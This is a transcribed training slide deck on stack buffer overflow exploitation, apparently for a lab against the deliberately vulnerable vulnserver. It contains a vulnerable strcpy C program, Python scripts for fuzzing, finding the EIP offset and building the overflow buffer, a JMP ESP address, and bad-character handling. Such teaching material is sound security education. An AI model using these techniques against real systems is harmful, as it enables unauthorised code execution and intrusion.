exploiting buffer overflows

34

Upload: paul-dutot-ieng-miet-mbcs-citp-qstm-oscp

Post on 16-Jul-2015

1.910 views

Category:

Technology


0 download

TRANSCRIPT

Page 1: Exploiting buffer overflows
Page 2: Exploiting buffer overflows

Disclaimer

@cyberkryption

The views expressed within this presentation or afterwards are my own and in no way represent my employer.

The following presentation describes how to conduct a buffer overflow attack.

These attacks are illegal to perform against systems that you do not have explicit permission to test.

I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.

Caveat: With knowledge comes responsibility

Page 3: Exploiting buffer overflows

Who am I

@cyberkryption

Page 4: Exploiting buffer overflows

Who is This?

Page 5: Exploiting buffer overflows

Von Neuman Explained..

Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec

Page 6: Exploiting buffer overflows

Phrack 49

Page 7: Exploiting buffer overflows

Meet the Stack

Each program has it's own stack as a memory structure.

Program data such as variable are also saved

Data is 'pushed' on to the stack and 'popped' off the stack

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Page 8: Exploiting buffer overflows

A Vulnerable 'C' program

#include<stdio.h>int main(int argc, char *argv[]){ char buff[20]; printf("copying into buffer"); strcpy(buff,argv[1]); return 0;}

We defined a character of size 20 bytes, it reserves some space on the stack

We copy the buffer using string copy without checking it's size

If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!

Page 9: Exploiting buffer overflows

Stack Overwrite

Data on the stack is overwritten.

Extra input overwrites other data in the stack

Eventually the instruction pointer is overwritten and we have control!!!

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Page 10: Exploiting buffer overflows

Meet the CPU Registers & Pointers

CPU PointersEIP = Points to the next address in memory to be executedESP = Stack Pointer. EBP = Stack Pointer Base Pointer

If we can overwrite EIP we can control execution flow other wise it's a DOS exploit.

CPU RegistersEAX AccumulatorEBX Base RegisterECX Counter RegisterEDX Data Register

Page 11: Exploiting buffer overflows

Meet vulnserver

Page 12: Exploiting buffer overflows

Initial Fuzzing#!/usr/bin/python

import socket

server = '192.168.1.65'

port = 9999

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, port))

print s.recv(1024)

print "Sending attack length ", length, ' to TRUN .'

attack = 'A' * length

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

Page 13: Exploiting buffer overflows

Initial Fuzzing - Video

Page 14: Exploiting buffer overflows

Initial Crash - Video

Page 15: Exploiting buffer overflows

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

????????

????????

????????

Page 16: Exploiting buffer overflows

EIP Hunting#!/usr/bin/python

import socket

server = '192.168.1.65'

port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, port))

print s.recv(1024)

print "Sending Evil Buffer to TRUN ."

attack = " < insert cyclic pattern here> "

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

Page 17: Exploiting buffer overflows

EIP Hunting – Cyclic Pattern Crash

Page 18: Exploiting buffer overflows

How to Locate EIP Overwrite

● After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register

● Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters.

● Lastly use pattern offset to find EIP overwrite

● Use convert.sh for HEX to ASCII conversion

Page 19: Exploiting buffer overflows

Locating EIP Offset - Video

Page 20: Exploiting buffer overflows

EIP Hunting Part II#!/usr/bin/pythonimport socketserver = '192.168.1.65'sport = 9999

prefix = 'A' * 2006eip = 'BBBB'padding = 'F' * (3000 - 2006 - 4)attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)connect = s.connect((server, sport))print s.recv(1024)print "Sending Buffer to TRUN "s.send(('TRUN .' + attack + '\r\n'))print s.recv(1024)s.send('EXIT\r\n')print s.recv(1024)s.close()

Page 21: Exploiting buffer overflows

EIP & Buffer Space Confirmed

Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes

Page 22: Exploiting buffer overflows

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

4 Bytes > 2006 + 980 bytes shellcode

EIP Overwite 'A' * 2006 Shellcode

Buffer Construction

????????

????????

Page 23: Exploiting buffer overflows

Determining JMP ESP Memory Location

Page 24: Exploiting buffer overflows

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

4 Bytes > 2006 + 980 bytes shellcode

EIP Overwite 'A' * 2006 Shellcode

Buffer Construction

625011AF in essfunc.dll

????????

Page 25: Exploiting buffer overflows

The Bad Character Problem

Hex Dec Description--- --- ---------------------------------------------0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument

Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!

Page 26: Exploiting buffer overflows

Determining Bad Characters

Page 27: Exploiting buffer overflows

Determining Bad Characters

Page 28: Exploiting buffer overflows

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

4 Bytes > 2006 980 bytes shellcode

EIP Overwite 'A' * 2006 Shellcode

Buffer Construction

625011AF in essfunc.dll

0x00

Page 29: Exploiting buffer overflows

Lets Create some Shellcode

Page 30: Exploiting buffer overflows

Final Buffer Structure & Operation

625011AF

EIP Overwite 'A' * 2006 Shellcode NOP Sled

JMP ESP

Buffer Overflow starts here

Execution to 625011AF

JMP ESP in 625011AF redirects to NOP SLED

Shellcode Runs

\xCC Breakpoint

Breakpoint Activated

Page 31: Exploiting buffer overflows

Putting it all together

Page 32: Exploiting buffer overflows

CVE2012-5958 /5959

Page 33: Exploiting buffer overflows

CVE2012-5958 /5959

Page 34: Exploiting buffer overflows

Questions ????

TWITTER: @cyberkryption

BLOG: cyberkryption.wordpress.com